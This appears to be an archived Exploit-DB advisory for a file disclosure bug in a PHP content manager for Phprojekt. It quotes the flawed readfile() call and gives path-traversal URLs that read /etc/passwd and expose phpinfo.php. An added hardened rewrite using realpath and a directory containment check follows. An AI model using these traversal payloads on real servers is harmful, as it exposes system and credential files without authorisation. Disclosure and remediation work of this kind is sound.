exploit-db-mirror/exploits/php/webapps/5510.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00


--------------------------------------------------------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo ---------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
= Author : HouSSaMix
= Script : Content Management System for Phprojekt
= Version : 0.6.1
= Download : http://www.mariovaldez.net/software/cm_4p/download.php
= BUG : Remote File Disclosure Vulnerability
Vulnerable CODE :
~~~~~~~~ graphie.php ~~~~~~~~~~~~~~~~~
readfile ($cm_imgpath . "/t.gif");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The variable $cm_imgpath is never declared in graphie.php before it is passed to readfile()
= Exploit :
target.com/cm/graphie.php?cm_imgpath=../.././../[file]
target.com/cm/graphie.php?cm_imgpath=../.././../etc/passwd
= see phpinfo
target.com/cm/phpinfo.php
= greetz : V40 - marwen.neo and all muslims Hackers
=================================================================================================================
# milw0rm.com [2008-04-27]
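
A hardened form of the graphie.php call shown above, as an added example that is not code from cm_4p or from the advisory's author. It assumes the undeclared variable is filled from the request query string, as the URLs above imply (for example through register_globals); CM_IMG_DIR, cm_safe_image_path() and the images/ directory are hypothetical names. It goes slightly beyond the fixed t.gif case by also showing how a requested file name would be confined to the image directory.

```php
<?php
// Added example (not the project's code). CM_IMG_DIR and cm_safe_image_path()
// are hypothetical names; the images/ layout is an assumption.
//
// Before, as quoted in the advisory (path prefix is never initialized):
//     readfile ($cm_imgpath . "/t.gif");

// The base directory is fixed in code and is never read from the request.
define('CM_IMG_DIR', __DIR__ . '/images');

/**
 * Resolve $name inside $baseDir.
 * Returns the canonical path, or null if the file is missing or the
 * resolved path falls outside $baseDir (traversal, symlink escape).
 */
function cm_safe_image_path(string $baseDir, string $name): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null; // base directory does not exist
    }

    // basename() discards every directory component, including "../".
    $candidate = realpath($base . DIRECTORY_SEPARATOR . basename($name));
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }

    // Containment check on the canonical path: it must start with "<base>/".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// The script only ever needs t.gif, so the name is a literal here.
$path = cm_safe_image_path(CM_IMG_DIR, 't.gif');
if ($path === null) {
    http_response_code(404);
    exit;
}

header('Content-Type: image/gif');
readfile($path);
```

The phpinfo.php page the advisory points to should also be removed from a deployed installation, since it exposes the server's PHP configuration to anyone who requests it.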